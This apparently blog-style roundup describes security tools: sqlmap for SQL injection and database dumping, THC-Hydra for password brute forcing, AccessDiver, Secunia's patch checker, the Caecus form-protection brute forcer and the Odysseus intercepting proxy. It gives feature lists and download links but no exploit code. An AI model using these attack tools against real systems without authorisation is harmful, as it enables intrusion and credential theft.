sqlmap – Automated Blind SQL Injection Tool

sqlmap is an automatic blind SQL injection tool, developed in python, capable of enumerating an entire remote database, performing an active database fingerprint and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

Features

• Test of the remote url stability, based on page hash or string match;
• Identification of url dynamic parameters;
• Test numeric, string (single quote and double quotes) SQL injection on all url dynamic parameters and at first vulnerable it will be used to perform the future SQL injections;
• Possible selection of HTTP method for testing and exploiting dynamic parameters, GET or POST (default: GET);
• Fingerprint of web application database back-end based upon specific queries output which identify database characteristics and banner grabbing;
• Random HTTP User-Agent header selection;
• HTTP Cookie header provided, useful when web application requires authorization based on cookies and you an account;
• Provide an anonymous HTTP proxy address to pass by request to the target url;
• Other command line parameters to get database banner, enumerate databases, tables, columns, dump values, retrieve an arbitrary file content and provide own SQL expression to query remote database;
• Debug output messages in verbose mode execution;
• PHP setting magic_quotes_gpc evasion by encoding every query string, between single quotes, with CHAR (or similar) database function.

You can find out more at http://sqlmap.sourceforge.net/ and the documentation is available here.

You can download sqlmap at:

sqlmap Files Page

For the development release you can browse its SourceForge SVN repository or directly download the source code:

$ svn co https://sqlmap.svn.sourceforge.net/svnroot/sqlmap sqlmap

THC-Hydra

THC-Hydra rocks, it’s pretty much the most up to date and currently developed password brute forcing tool around at the moment.

It supports a LOT of services and protocols too.

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallelized connects.

Currently this tool supports:

TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTP-HEAD, HTTP-PROXY, LDAP2,
LADP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, SOCKS5, VNC, POP3, IMAP,
NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, SMTP-AUTH, SSH2, SNMP,
CVS, Cisco AAA.

However the module engine for new services is very easy so it won’t take a long time until even more services are supported. Planned are: SSH v1, Oracle and more…

This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.

There is a lot more information contained in the README file here.

You can download Hydra here:

hydra-5.4-src.tar.gz

Compile and install (./configure; make; make install)

IF you want the windows version you can grab this Cygwin version:

hydra-5.4-win.zip

More info is available here:

THC-Hydra Homepage

AccessDiver – Web Site Security Testing

AccessDiver is a security tester for WEB sites. It incorporates a set of powerful features which help you find and organize failures and weaknesses from your web site.

AccessDiver can detect security failures on your web pages. It has multiple efficient tools which will verify the robustness of your accounts and directories accurately. So, you will know if your customers, your users and yourself can safely use your web site.

Here is a quick list of the features available:

• Contains fast security that uses up to 100 bots to do its analysis.
• Detects directory failures by comparing hundreds of known problems to your site.
• AccessDiver is fully proxy compliant and has a proxy analyzer (speed / anonymity) and a proxy hunter built-in.
• A built-in word leecher helps you increase the size of your dictionaries to expand and reinforce your analysis.
• A powerful task automizer manages your jobs transparently. You can tackle unlrelated tasks while Accessdiver is working, saving you time.
• An on-the-fly word manipulator lets you increase the strength of your dictionaries easily when doing your analyzis.
• A PING tester is included to tell you the efficiency of your site and the efficiency of an Internet address you would like to access.
• A DNS resolver lets you look up the host name of an IP address and reverse the process to learn an unknown host name.
• A feature called ‘HTTP debugger’ helps your understanding of how actual HTTP protocol works. It opens up the process so you see what really happens during a connection problem.
• A WHOIS gadget lets you retrieve owner information of a domain name (in case you would like to buy the domain or contact the actual owner).
• An update notifier automatically tells you when a new version of AccessDiver is available.

You can find out more here and download AccessDiver here:

AccessDiver

Secunia

Feature Overview – The Secunia Software Inspector:

• Detects insecure versions of applications installed
• Verifies that all Microsoft patches are applied
• Assists you in updating your system and applications
• Runs through your browser. No installation or download is required.

How Does it Work:

The Secunia Software Inspector relies on carefully crafted “Secunia File Signatures” to recognise applications on your system. The detected applications are then matched against our “Secunia Advisory Intelligence” to determine whether an application is up-to-date or not. The results are then used to advise you on how to update to more secure releases of the insecure applications.

Microsoft Windows Update is used to determine if your system is missing security updates from Microsoft.

The Secunia Software Inspector covers the most common/popular end user applications:

• Internet browsers
• Internet browser plugins
• Instant messaging clients
• Email clients
• Media players
• Operating systems

You can find the Inspector here:

Secunia Software Inspector

Minimum Requirements:

• Windows 2000, Windows XP, or Windows 2003
• Sun Java JRE 1.5.0_06
• Internet Explorer 6.x, Opera 9.x, or Firefox 1.5.x
• Latest version of Microsoft Windows Update

Caecus

Caecus is a unique tool which can bruteforce some OCR form based protections.

As far as we know at Darknet, this is the only publicly available OCR brute forcing tool.

These scripts generates a digital image as an extra layer of security called OCR. Some versions of this script also use session id’s to keep track of this information.

Using Caecus, you can now successfully run attacks on these sites.

There are some ocr sites that use another form type. You can recognize them by the fact that they have a ‘grid’ behind the numbers in the image. Caecus cannot test these sites…yet!

You can read more about download Caecus here:

Caecus at Deny.de

Odysseus Win32 Proxy & Telemachus HTTP Transaction Analysis

Introducing a pair of tools that go well together and give you some good control for HTTP transaction analysis and looking at the security of web applications.

Odysseus is a tool designed for testing the security of web applications.

Odysseus is a proxy server, which acts as a man-in-the-middle during an HTTP session. A typical HTTP proxy will relay packets to and from a client browser and a web server. Odysseus will intercept an HTTP session’s data in either direction and give the user the ability to alter the data before transmission.

For example, during a normal HTTP SSL connection a typical proxy will relay the session between the server and the client and allow the two end nodes to negotiate SSL. In contrast, when in intercept mode, Odysseus will pretend to be the server and negotiate two SSL sessions, one with the client browser and another with the web server.

As data is transmitted between the two nodes, Odysseus decrypts the data and gives the user the ability to alter and/or log the data in clear text before transmission.

You can find more and download Odysseus here:

http://www.bindshell.net/tools/odysseus

Telemachus is a companion utility for Odysseus, allowing further analysis and manipulation of the HTTP transactions that have passed through Odysseus.

Telemachus can communicate with the currently active instance of Odysseus, or alternately load a previously saved Odysseus activity log file.

Although primarily designed to be used in conjunction with Odysseus, Telemachus can be used a stand-alone utility.

You can download Telemachus here:

http://www.bindshell.net/tools/telemachus